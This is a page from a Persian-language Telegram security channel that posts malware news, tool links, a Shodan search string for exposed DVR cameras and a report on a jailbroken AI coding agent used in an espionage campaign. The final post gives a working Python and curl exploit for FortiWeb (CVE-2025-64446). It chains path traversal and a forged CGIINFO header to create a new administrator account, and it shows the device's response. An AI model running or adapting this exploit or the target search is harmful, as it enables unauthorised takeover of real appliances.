Mr. SAM – Telegram
Mr. SAM
148 subscribers
131 photos
7 videos
23 files
751 links
یکشنبه
۷ ‏( دی = ۱۰ )‏ ۱٤۰٤
‏28 ( دسامبر = december = 12 ) 2025
تکنیک‌ها ، کالبدشکافی ، درک عمیق ، یک قدم جلوتر ...
https://news.1rj.ru/str/boost/NullError_ir
Download Telegram
#CCTV

اکسپلویت نوشته شده با Rust برای آسیب‌پذیری CVE-2018-9995

شودان 🤔

"GNU rsp/1.0" geo:"xx.xxxx, xx.xxxx, 3"

@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
#ASL

Free Windows software

Detect packer , compiler , protector , .NET obfuscator , PUA application

or

Binary packed data : rar , zip , iso , 7zip , zx , sqz , lz4 , img , ...

@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
#RondoDox_v2

بدافزار RondoDox نسخه دوم :

استفاده از ۷۵ اکسپلویت مجزا که نشان دهنده افزایش چند صد درصدی نسبت به نسخه اول این بدافزار است . تمرکز بدافزار از DVR و روترها ، به برنامه‌های کاربردی سازمانی گسترش یافته است .

اطلاعات بیشتر ...

@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
#SleepyDuck

بدافزار SleepyDuck : یک تروجان (RAT) پیشرفته که به طور خاص ابزارهایی مانند Cursor و Windsurf را هدف قرار می‌دهد و از یک قرارداد هوشمند اتریوم برای ماندگاری و (C&C) خود استفاده می‌کند.

بخوانید ...

@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
1
#Strix

یکی از جذاب ترین خبر برای باری کسانی که #باگبانتی کار میکنند یا علاقه دارند به این موضوع

مجموعه‌ای از ایجنت های هوش مصنوعی‌به اسم Strix که مثل یک هکر واقعی عمل می‌کنن! کد شما رو به‌صورت پویا اجرا می‌کنن، حفره‌های امنیتی رو پیدا می‌کنن، و حتی با نمونه‌ی واقعی (Proof-of-Concept) اون‌ها رو تأیید می‌کنه!

ادامه ...

@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
1
Forwarded from 🕸 Articles
Forwarded from 🕸 Articles
JS for Hacker-Volume 1.pdf
9.2 MB
Author: zarvan
Language: Persian
Telegram channel: @web_articles
Forwarded from 🕸 Articles
این کتاب رایگان هست و هیچ قیمتی براش نذاشتم. اما اگه دوست داشتید از من حمایت کنید، می‌تونید از این لینک استفاده کنید:

https://daramet.com/web_articles


همچنین می‌تونید با به اشتراک گذاشتن کتاب، کمک کنید که بیشتر دیده بشه.
Mr. SAM
Photo
VMProtect PE Unpacker.exe
7.9 MB
#VMPUnpacker

ظاهرا ابزار جدیدی ( VMPUnpacker ) در فروم‌های چینی معرفی شده که قابل قبول کار میکنه ... ( در محیط آزمایشگاهی تست کنید )

@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
#Knownsec

‼️بزرگترین شرکت امنیت سایبری چین، Knownsec، مورد نفوذ قرار گرفت و جزئیات عملیات سایبری دولت چین فاش شد.

این داده‌ها شامل اسناد سلاح سایبری، کد منبع ابزار هک داخلی و فهرست اهداف جهانی است که بیش از 20 کشور از جمله ژاپن، ویتنام و هند را پوشش می‌دهد.

در یک فایل اکسل، فهرستی از ۸۰ سازمان خارجی هک‌شده، به علاوه‌ی شواهدی از ۹۵ گیگابایت اطلاعات سرقت‌شده‌ی مهاجرتی هندی‌ها و ۳ ترابایت اطلاعات تماس از اپراتور تلفن همراه LG U Plus کره‌ی جنوبی، ارائه شده است.

( در یکی از اسناد به یک پاوربانک مخرب اشاره می‌کند )

۔Knownsec کلید امنیت سایبری چین است و قابلیت‌های دفاعی و تهاجمی پیشرفته، از جمله ابزارهای جاسوسی، را فراهم می‌کند.
Please open Telegram to view this post
VIEW IN TELEGRAM
1
شرکت Anthropic اعلام کرده که یه حمله سایبری خیلی پیچیده رو کشف و متوقف کرده؛ حمله‌ای که برخلاف گذشته، نه توسط یه تیم هکری بزرگ، بلکه بیشتر توسط یه مدل هوش مصنوعی عامل‌محور اجرا شده بوده. عامل تهدید هم، طبق ارزیابی Anthropic، یه گروه تحت حمایت دولت چین بوده.

نکته مهم این حمله اینه که مهاجما تونستن ابزار «Claude Code» رو جوری جیل‌بریک کنن که خودش کارهای لازم رو انجام بده؛ یعنی انتخاب هدف، شناسایی، نوشتن کدهای بهره‌برداری، جمع‌کردن اعتبارنامه‌ها و حتی استخراج داده‌های حساس. طبق گزارش، حدود ۸۰ تا ۹۰ درصد حمله رو خود هوش مصنوعی انجام داده و فقط چند نقطه تصمیم‌گیری بحرانی توسط انسان مدیریت شده. سرعت کار هم به حدی بالا بوده که عملاً هیچ تیم انسانی نمی‌تونست باهاش رقابت کنه.

این اتفاق یه پیام روشن داره: با ظهور مدل‌های «agentic»، فاصله بین توانایی گروه‌های حرفه‌ای و گروه‌های کم‌تجربه خیلی کم شده. یعنی اگه یه تیم کوچک به این ابزارها دسترسی پیدا کنه، بالقوه می‌تونه حملاتی در سطح دولت‌ها انجام بده. از اون طرف خود Anthropic هم تأکید می‌کنه که همین قابلیت‌ها برای دفاع ضروری هستن؛ چون مدل‌های قوی می‌تونن شناسایی حملات، تحلیل کدهای مخرب و مدیریت پاسخ امنیتی رو سریع‌تر از هر تیم انسانی انجام بدن.

به‌طور خلاصه، این پرونده یه هشدار جدیه:
حمله‌های سایبری داره از “هکرها” به “عامل‌های خودمختار هوش مصنوعی” منتقل می‌شه و سرعت این تغییر خیلی بیشتر از پیش‌بینی‌هاست. صنعت امنیت سایبری ناچار می‌شه همزمان که جلوی سوءاستفاده رو می‌گیره، خودش هم به شکل گسترده‌تر از همین فناوری استفاده کنه.
Source
#هوش_مصنوعی

✈️@mohammad_zammani
📱@mohammad.zammani.offical
Please open Telegram to view this post
VIEW IN TELEGRAM
#Obfuscator

نوشتن یک ابزار مبهم‌ساز توسط محقق امنیتی و متخصص مهندسی معکوس خانم ژائو ویتور - ژاپنی .

توسعه ابزار Obfuscator/Deobfuscating از ابتدا ...

@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
1
#FortiWeb

CVE-2025-64446 اجرای کد از راه دور بدون احراز هویت در FortiWeb از طریق عبور مسیر و دور زدن احراز هویت CGI
*
*
یعنی بر اساس این
می‌توان چنین چیزی به دست آورد:
python3 - <<'PY'
import base64, json, subprocess
header = base64.b64encode(json.dumps({
"username": "admin",
"profname": "prof_admin",
"vdom": "root",
"loginname": "admin"
}).encode()).decode()

payload = json.dumps({
"data": {
"q_type": 1,
"name": "note2",
"access-profile": "prof_admin",
"password": "note2",
"comment": "automated RCE"
}
})

cmd = [
"curl", "--path-as-is", "-sk",
"-H", f"CGIINFO: {header}",
"-H", "Content-Type: application/json",
"--data", payload,
"https://localhost:38443/api/v2.0/cmdb/system/admin%3f/../../../../cgi-bin/fwbcgi"
]
print(subprocess.run(cmd, capture_output=True, text=True).stdout)
PY

خروجی از دستگاه:

{ "results": { "name": "note2", "access-profile": "prof_admin", ... } }


یعنی به سادگی یک ادمین جدید می‌سازیم ...
Please open Telegram to view this post
VIEW IN TELEGRAM
1